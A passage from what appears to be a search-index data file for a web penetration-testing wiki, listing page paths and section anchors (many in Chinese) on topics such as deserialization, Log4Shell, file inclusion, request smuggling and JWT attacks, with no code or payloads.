点","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#参考","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#prototype-pollution-to-rce","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#vulnerable-code","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#pp2rce-通过环境变量","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#毒化-__proto__","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#污染-constructorprototype","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#pp2rce-via-env-vars--cmdline","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#filesystem-less-pp2rce-via---import-node--19","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#为什么---import-有帮助","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#dns-交互","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#pp2rce-漏洞-child_process-函数","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#强制生成","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#控制-require-文件路径","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#通过原型污染设置-require-文件路径","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#vm-gadgets","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#fixes--unexpected-protections","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#other-gadgets","p
entesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#references","pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.html","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#java-dns-反序列化gadgetprobe-和-java-反序列化扫描器","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#反序列化中的-dns-请求","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#urldns-负载代码示例","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#更多信息","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#gadgetprobe","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#它是如何工作的","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#更多信息-1","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#java-反序列化扫描仪","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#被动","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#主动","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#java-反序列化-dns-外泄信息","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#更多信息-2","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#basic-java-deserialization-with-objectinputstream-readobject","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#serializable","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#提醒在反序列化过程中哪些方法会被隐式调用","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#结论经典场景","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#2023-2025java-反序列化攻击的新动态","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#现代缓解措施","pentesting-web/deseri
alization/basic-java-deserialization-objectinputstream-readobject.html#更新的工具备忘单2024","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#安全-readobject-实现的快速检查清单","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#参考文献","pentesting-web/deserialization/php-deserialization-+-autoload-classes.html#php---反序列化--自动加载类","pentesting-web/deserialization/php-deserialization-+-autoload-classes.html#php-反序列化--spl_autoload_register--lfigadget","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#commonscollection1-payload---java-transformers-to-rutime-exec-and-thread-sleep","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#java-transformers-to-rutime-exec","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#如何","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#摘要","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#java-线程休眠","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#更多小工具","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#基础-net-反序列化-objectdataprovider-gadget-expandedwrapper-and-jsonnet","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#objectdataprovider-gadget","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#这是如何实现的","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#expandedwrapper","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#jsonnet","pentesting-web/deserialization/basic-.net-deserialization-objectda
taprovider-gadgets-expandedwrapper-and-json.net.html#jsonnet-示例","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#滥用-jsonnet","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#高级-net-gadget-chains-ysonet--ysoserialnet","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#构建--安装-ysonet","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#检测与加固","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#真实世界-sink-sitecore-converttoruntimehtml--binaryformatter","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#参考资料","pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.html","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#利用-__viewstate-而不知其秘密","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#什么是-viewstate","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#测试用例","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#测试用例1--enableviewstatemacfalse-和-viewstateencryptionmodefalse","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#test-case-15--like-test-case-1-but-the-viewstate-cookie-isnt-sent-by-the-server","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#test-case-2--net--45-and-enableviewstatemactrue--viewstateencryptionmodefalse","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#test-case-3--net--45-和-enableviewstatemactruefalse-和-viewstateencryptionmodetrue","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#test-case-4--net--45-和-enableviewstatemactruefalse-和-viewstateencryptionmodetruefalse
除非两个属性都为-false","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#测试用例-6--使用-viewstateuserkeys","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#成功利用的结果","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#通过反射转储-aspnet-机器密钥-sharpyshellsharepoint-toolshell","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#2024-2025年实际利用场景和硬编码机器密钥","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#微软公开披露的机器密钥浪潮2024年12月--2025年2月","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#cve-2025-30406--gladinet-centrestack--triofox-硬编码密钥","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#参考文献","pentesting-web/deserialization/python-yaml-deserialization.html#python-yaml-反序列化","pentesting-web/deserialization/python-yaml-deserialization.html#yaml--反序列化","pentesting-web/deserialization/python-yaml-deserialization.html#基本利用","pentesting-web/deserialization/python-yaml-deserialization.html#漏洞-load-没有-loader","pentesting-web/deserialization/python-yaml-deserialization.html#rce","pentesting-web/deserialization/python-yaml-deserialization.html#创建有效负载的工具","pentesting-web/deserialization/python-yaml-deserialization.html#参考文献","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#jndi---java-naming-and-directory-interface--log4shell","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#基本信息","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#jndi命名参考","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#jndi示例","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#corba概述","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rmi上下文","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#ldap","pentest
ing-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#log4shell漏洞","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#log4shell相关cve概述","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-44228---严重","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-45046---严重","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-4104---高","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-42550---中等","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-45105---高","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-44832","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#log4shell利用","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#发现","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#验证","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce-信息","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce---marshalsec-与自定义有效载荷","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce----jndiexploit","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce---jndi-exploit-kit","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce---jndi-injection-exploit-plus","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce---ysoserial--jndi-exploit-kit","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#绕过方法","pentesting-web/deserializa
tion/jndi-java-naming-and-directory-interface-and-log4shell.html#自动扫描器","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#测试实验室","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#post-log4shell-利用","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#环境查找","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#异常中的提取","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#转换模式异常","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#转换模式正则表达式","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#参考文献","pentesting-web/deserialization/ruby-_json-pollution.html#ruby-_json-污染","pentesting-web/deserialization/ruby-_json-pollution.html#基本信息","pentesting-web/deserialization/ruby-_json-pollution.html#参考","pentesting-web/deserialization/ruby-class-pollution.html#ruby-class-pollution","pentesting-web/deserialization/ruby-class-pollution.html#merge-on-attributes","pentesting-web/deserialization/ruby-class-pollution.html#解释","pentesting-web/deserialization/ruby-class-pollution.html#现实案例","pentesting-web/deserialization/ruby-class-pollution.html#activesupport-的-deep_merge","pentesting-web/deserialization/ruby-class-pollution.html#hashie的-deep_merge","pentesting-web/deserialization/ruby-class-pollution.html#poison-the-classes","pentesting-web/deserialization/ruby-class-pollution.html#poison-parent-class","pentesting-web/deserialization/ruby-class-pollution.html#污染其他类","pentesting-web/deserialization/ruby-class-pollution.html#references","pentesting-web/domain-subdomain-takeover.html#domainsubdomain-takeover","pentesting-web/domain-subdomain-takeover.html#domain-takeover","pentesting-web/domain-subdomain-takeover.html#subdomain-takeover","pentesting-web/domain-subdomain-takeover.html#subdomain-takeover-generatio
n-via-dns-wildcard","pentesting-web/domain-subdomain-takeover.html#exploiting-a-subdomain-takeover","pentesting-web/domain-subdomain-takeover.html#ssl-certificates","pentesting-web/domain-subdomain-takeover.html#cookie-security-and-browser-transparency","pentesting-web/domain-subdomain-takeover.html#cors-bypass","pentesting-web/domain-subdomain-takeover.html#csrf---same-site-cookies-bypass","pentesting-web/domain-subdomain-takeover.html#oauth-tokens-redirect","pentesting-web/domain-subdomain-takeover.html#csp-bypass","pentesting-web/domain-subdomain-takeover.html#emails-and-subdomain-takeover","pentesting-web/domain-subdomain-takeover.html#higher-order-risks","pentesting-web/domain-subdomain-takeover.html#cname-record-vulnerability","pentesting-web/domain-subdomain-takeover.html#mitigation-strategies","pentesting-web/domain-subdomain-takeover.html#references","pentesting-web/email-injections.html#email-injections","pentesting-web/email-injections.html#注入已发送的电子邮件","pentesting-web/email-injections.html#在发件人参数后注入-cc-和-bcc","pentesting-web/email-injections.html#注入参数","pentesting-web/email-injections.html#注入主题参数","pentesting-web/email-injections.html#更改消息正文","pentesting-web/email-injections.html#php-mail-函数利用","pentesting-web/email-injections.html#在电子邮件名称中注入","pentesting-web/email-injections.html#被忽略的电子邮件部分","pentesting-web/email-injections.html#白名单绕过","pentesting-web/email-injections.html#引号","pentesting-web/email-injections.html#ip","pentesting-web/email-injections.html#电子邮件编码","pentesting-web/email-injections.html#其他漏洞","pentesting-web/email-injections.html#第三方-sso","pentesting-web/email-injections.html#xss","pentesting-web/email-injections.html#账户接管","pentesting-web/email-injections.html#回复至","pentesting-web/email-injections.html#硬退信率","pentesting-web/email-injections.html#参考文献","pentesting-web/file-inclusion/index.html#file-inclusionpath-traversal","pentesting-web/file-inclusion/index.html#file-inclusion","pentesting-web/file-inclusion/index.html#blind---interesting
---lfi2rce-files","pentesting-web/file-inclusion/index.html#linux","pentesting-web/file-inclusion/index.html#windows","pentesting-web/file-inclusion/index.html#os-x","pentesting-web/file-inclusion/index.html#basic-lfi-and-bypasses","pentesting-web/file-inclusion/index.html#traversal-sequences-被非递归地剥离","pentesting-web/file-inclusion/index.html#null-byte-00","pentesting-web/file-inclusion/index.html#编码","pentesting-web/file-inclusion/index.html#来自已存在的文件夹","pentesting-web/file-inclusion/index.html#在服务器上探索文件系统目录","pentesting-web/file-inclusion/index.html#path-truncation-technique","pentesting-web/file-inclusion/index.html#filter-bypass-tricks","pentesting-web/file-inclusion/index.html#remote-file-inclusion","pentesting-web/file-inclusion/index.html#python-根元素","pentesting-web/file-inclusion/index.html#java-列出目录","pentesting-web/file-inclusion/index.html#前25个参数","pentesting-web/file-inclusion/index.html#lfi--rfi-使用-php-wrappers--protocols","pentesting-web/file-inclusion/index.html#phpfilter","pentesting-web/file-inclusion/index.html#使用-php-filters-作为-oracle-读取任意文件","pentesting-web/file-inclusion/index.html#phpfd","pentesting-web/file-inclusion/index.html#zip-and-rar","pentesting-web/file-inclusion/index.html#data","pentesting-web/file-inclusion/index.html#expect","pentesting-web/file-inclusion/index.html#input","pentesting-web/file-inclusion/index.html#phar","pentesting-web/file-inclusion/index.html#cve-2024-2961","pentesting-web/file-inclusion/index.html#more-protocols","pentesting-web/file-inclusion/index.html#lfi-via-phps-assert","pentesting-web/file-inclusion/index.html#php-blind-path-traversal","pentesting-web/file-inclusion/index.html#lfi2rce","pentesting-web/file-inclusion/index.html#arbitrary-file-write-via-path-traversal-webshell-rce","pentesting-web/file-inclusion/index.html#remote-file-inclusion-1","pentesting-web/file-inclusion/index.html#通过-apachenginx-日志文件","pentesting-web/file-inclusion/index.html#通过电子邮件","pentesting-web/file-inclusion/index.html#通过-procfd
","pentesting-web/file-inclusion/index.html#通过-procselfenviron","pentesting-web/file-inclusion/index.html#通过-upload","pentesting-web/file-inclusion/index.html#通过-zip-文件上传","pentesting-web/file-inclusion/index.html#通过-php-sessions","pentesting-web/file-inclusion/index.html#通过-ssh","pentesting-web/file-inclusion/index.html#通过---vsftpd----日志","pentesting-web/file-inclusion/index.html#通过-php-base64-filter-using-base64","pentesting-web/file-inclusion/index.html#via-php-filters-no-file-needed","pentesting-web/file-inclusion/index.html#via-segmentation-fault","pentesting-web/file-inclusion/index.html#via-nginx-temp-file-storage","pentesting-web/file-inclusion/index.html#via-php_session_upload_progress","pentesting-web/file-inclusion/index.html#via-temp-file-uploads-in-windows","pentesting-web/file-inclusion/index.html#via-pearcmdphp--url-args","pentesting-web/file-inclusion/index.html#通过-phpinfo-file_uploads--on","pentesting-web/file-inclusion/index.html#通过-compresszlib--php_stream_prefer_studio--path-disclosure","pentesting-web/file-inclusion/index.html#通过-eternal-waiting--bruteforce","pentesting-web/file-inclusion/index.html#导致-fatal-error","pentesting-web/file-inclusion/index.html#references","pentesting-web/file-inclusion/phar-deserialization.html#phar-deserialization","pentesting-web/file-inclusion/phar-deserialization.html#参考文献","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#lfi2rce-via-php-filters","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#简介","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#如何向生成的数据添加后缀","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#自动化工具","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#完整脚本","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#improvements","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#更多参考","pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.html#lfi2rce-via-nginx-temp-files","pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files
.html#易受攻击的配置","pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.html#实验室","pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.html#参考","pentesting-web/file-inclusion/via-php_session_upload_progress.html#lfi2rce-via-php_session_upload_progress","pentesting-web/file-inclusion/via-php_session_upload_progress.html#基本信息","pentesting-web/file-inclusion/via-php_session_upload_progress.html#ctf","pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.html#lfi2rce-通过分段错误","pentesting-web/file-inclusion/lfi2rce-via-phpinfo.html#理论","pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.html#php-文件上传","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#lfi2rce-via-eternal-waiting","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#基本信息","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#其他技术","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#永久等待技术","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#apache2","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#php-fmp","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#nginx","pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.html#lfi2rce-通过-compresszlib--php_stream_prefer_stdio--路径泄露","pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.html#compresszlib-和-php_stream_prefer_stdio","pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.html#竞争条件到-rce","pentesting-web/file-upload/index.html#文件上传","pentesting-web/file-upload/index.html#文件上传通用方法论","pentesting-web/file-upload/index.html#绕过文件扩展名检查","pentesting-web/file-upload/index.html#bypass-content-type-magic-number-compression--resizing","pentesting-web/file-upload/index.html#other-tricks-to-check","pentesting-web/file-upload/index.html#special-extension-tricks","pentesting-web/file-upload/index.html#jetty-rce","pen
testing-web/file-upload/index.html#uwsgi-rce","pentesting-web/file-upload/index.html#wget-文件上传ssrf-技巧","pentesting-web/file-upload/index.html#工具","pentesting-web/file-upload/index.html#利用-snprintf-异常破坏上传索引历史","pentesting-web/file-upload/index.html#从文件上传到其他漏洞","pentesting-web/file-upload/index.html#magic-header-bytes","pentesting-web/file-upload/index.html#ziptar-file-automatically-decompressed-upload","pentesting-web/file-upload/index.html#符号链接-symlink","pentesting-web/file-upload/index.html#在不同文件夹解压","pentesting-web/file-upload/index.html#imagetragic","pentesting-web/file-upload/index.html#在-png-中嵌入-php-shell","pentesting-web/file-upload/index.html#polyglot-files","pentesting-web/file-upload/index.html#像上传-pdf-一样上传有效的-json","pentesting-web/file-upload/index.html#参考资料","pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.html#pdf-上传---xxe-和-cors-绕过","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#formulacsvdoclatexghostscript-injection","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#formula-injection","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#info","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#wordlist","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#超链接","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#rce","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#local-file-inclusion-lfi-in-libreoffice-calc","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#google-sheets-for-out-of-band-oob-data-exfiltration","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#latex-injection","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#read-file","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#写入文件","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#命令执行","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#跨站脚本攻击","pentesting-web/formula-csv-doc-latex-ghostscript-inje
ction.html#ghostscript-注入","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#参考文献","pentesting-web/grpc-web-pentest.html#pentesting-grpc-web","pentesting-web/grpc-web-pentest.html#操纵-grpc-web-负载","pentesting-web/grpc-web-pentest.html#使用-ggrpc-coder-工具手动操作","pentesting-web/grpc-web-pentest.html#使用-grpc-web-coder-burp-suite-扩展的手动操作","pentesting-web/grpc-web-pentest.html#分析-grpc-web-javascript-文件","pentesting-web/grpc-web-pentest.html#参考文献","pentesting-web/http-connection-contamination.html#http-连接污染","pentesting-web/http-connection-request-smuggling.html#http-connection-request-smuggling","pentesting-web/http-connection-request-smuggling.html#connection-state-attacks","pentesting-web/http-connection-request-smuggling.html#first-request-validation","pentesting-web/http-connection-request-smuggling.html#first-request-routing","pentesting-web/http-connection-request-smuggling.html#2023-2025-新增--http23-连接合并滥用","pentesting-web/http-connection-request-smuggling.html#利用场景","pentesting-web/http-connection-request-smuggling.html#工具","pentesting-web/http-connection-request-smuggling.html#缓解措施","pentesting-web/http-connection-request-smuggling.html#真实案例-2022-2025","pentesting-web/http-connection-request-smuggling.html#检测备忘单","pentesting-web/http-connection-request-smuggling.html#参考文献","pentesting-web/http-request-smuggling/index.html#http-request-smuggling--http-desync-attack","pentesting-web/http-request-smuggling/index.html#是什么","pentesting-web/http-request-smuggling/index.html#原理","pentesting-web/http-request-smuggling/index.html#实际情况","pentesting-web/http-request-smuggling/index.html#细节","pentesting-web/http-request-smuggling/index.html#visible---hidden","pentesting-web/http-request-smuggling/index.html#基本示例","pentesting-web/http-request-smuggling/index.html#漏洞类型基本示例","pentesting-web/http-request-smuggling/index.html#finding-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#finding-clte-vulnerabilities-using-timing-techniques","pentesti
ng-web/http-request-smuggling/index.html#finding-tecl-vulnerabilities-using-timing-techniques","pentesting-web/http-request-smuggling/index.html#other-methods-to-find-vulnerabilities","pentesting-web/http-request-smuggling/index.html#the-expect-100-continue-header","pentesting-web/http-request-smuggling/index.html#http-request-smuggling-vulnerability-testing","pentesting-web/http-request-smuggling/index.html#distinguishing-http11-pipelining-artifacts-vs-genuine-request-smuggling","pentesting-web/http-request-smuggling/index.html#why-pipelining-creates-classic-false-positives","pentesting-web/http-request-smuggling/index.html#litmus-tests-pipelining-or-real-desync","pentesting-web/http-request-smuggling/index.html#connectionlocked-request-smuggling-reuse-required","pentesting-web/http-request-smuggling/index.html#clientside-desync-constraints","pentesting-web/http-request-smuggling/index.html#tooling-to-help-decide","pentesting-web/http-request-smuggling/index.html#abusing-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#circumventing-front-end-security-via-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#揭示前端请求重写","pentesting-web/http-request-smuggling/index.html#捕获其他用户的请求","pentesting-web/http-request-smuggling/index.html#使用-http-request-smuggling-利用-reflected-xss","pentesting-web/http-request-smuggling/index.html#exploiting-on-site-redirects-with-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#利用-web-cache-poisoning-通过-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception","pentesting-web/http-request-smuggling/index.html#通过-http-request-smuggling-滥用-trace","pentesting-web/http-request-smuggling/index.html#abusing-trace-via-http-response-splitting","pentesting-web/http-request-smuggling/index.html#使用-http-response-desynchronisation-将-http-request-smuggling-武器化","pentesting-web/http-request-smuggling/index.html#
其他-http-request-smuggling-技术","pentesting-web/http-request-smuggling/index.html#turbo-intruder-脚本","pentesting-web/http-request-smuggling/index.html#clte","pentesting-web/http-request-smuggling/index.html#tecl","pentesting-web/http-request-smuggling/index.html#工具","pentesting-web/http-request-smuggling/index.html#参考资料","pentesting-web/http-request-smuggling/browser-http-request-smuggling.html#浏览器-http-请求走私","pentesting-web/http-request-smuggling/browser-http-request-smuggling.html#参考","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#http2降级中的请求走私","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#为什么会发生降级","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#两种主要原始类","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#识别降级链","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#利用工作流程h2te示例","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#h2c-走私明文升级","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#notable-real-world-cves-2022-2025","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#工具","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#防御措施","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#参考文献","pentesting-web/http-response-smuggling-desync.html#http-response-smuggling--desync","pentesting-web/http-response-smuggling-desync.html#http-请求队列去同步","pentesting-web/http-response-smuggling-desync.html#http-管道去同步","pentesting-web/http-response-smuggling-desync.html#多重嵌套注入","pentesting-web/http-response-smuggling-desync.html#漏洞组织","pentesting-web/http-response-smuggling-desync.html#利用-http-响应队列去同步","pentesting-web/http-response-smuggling-desync.html#捕获其他用户的请求","pentesting-web/http-response-smuggling-desync.html#响应去同步","pentesting-web/http-response-smugglin
g-desync.html#内容混淆","pentesting-web/http-response-smuggling-desync.html#缓存中毒","pentesting-web/http-response-smuggling-desync.html#web-缓存欺骗","pentesting-web/http-response-smuggling-desync.html#响应分割","pentesting-web/h2c-smuggling.html#升级头部走私","pentesting-web/h2c-smuggling.html#h2c-走私","pentesting-web/h2c-smuggling.html#websocket-smuggling","pentesting-web/h2c-smuggling.html#场景-1","pentesting-web/h2c-smuggling.html#场景-2","pentesting-web/h2c-smuggling.html#参考文献","pentesting-web/abusing-hop-by-hop-headers.html#hop-by-hop-headers","pentesting-web/abusing-hop-by-hop-headers.html#滥用-hop-by-hop-headers","pentesting-web/abusing-hop-by-hop-headers.html#测试-hop-by-hop-header-处理","pentesting-web/abusing-hop-by-hop-headers.html#通过-x-forwarded-for-绕过安全控制","pentesting-web/abusing-hop-by-hop-headers.html#通过-hop-by-hop-header-注入进行缓存中毒","pentesting-web/idor.html#idor-insecure-direct-object-reference","pentesting-web/idor.html#1-识别潜在的-idors","pentesting-web/idor.html#quick-manual-tampering-burp-repeater","pentesting-web/idor.html#自动化枚举-burp-intruder--curl-loop","pentesting-web/idor.html#error-response-oracle-for-userfile-enumeration","pentesting-web/idor.html#2-真实案例研究--mchire-chatbot-platform-2025","pentesting-web/idor.html#3-idor--bola-的影响","pentesting-web/idor.html#4-缓解措施与最佳实践","pentesting-web/idor.html#5-工具","pentesting-web/idor.html#参考资料","pentesting-web/hacking-jwt-json-web-tokens.html#jwt-vulnerabilities-json-web-tokens","pentesting-web/hacking-jwt-json-web-tokens.html#快速胜利","pentesting-web/hacking-jwt-json-web-tokens.html#在不修改任何内容的情况下篡改数据","pentesting-web/hacking-jwt-json-web-tokens.html#来源","pentesting-web/hacking-jwt-json-web-tokens.html#持续时间","pentesting-web/hacking-jwt-json-web-tokens.html#暴力破解-hmac-密钥","pentesting-web/hacking-jwt-json-web-tokens.html#将算法修改为-none","pentesting-web/hacking-jwt-json-web-tokens.html#将算法-rs256非对称更改为-hs256对称cve-2016-5431cve-2016-10555","pentesting-web/hacking-jwt-json-web-tokens.html#new-public-key-inside-the-header","pentesting-web/hacking-jwt-jso
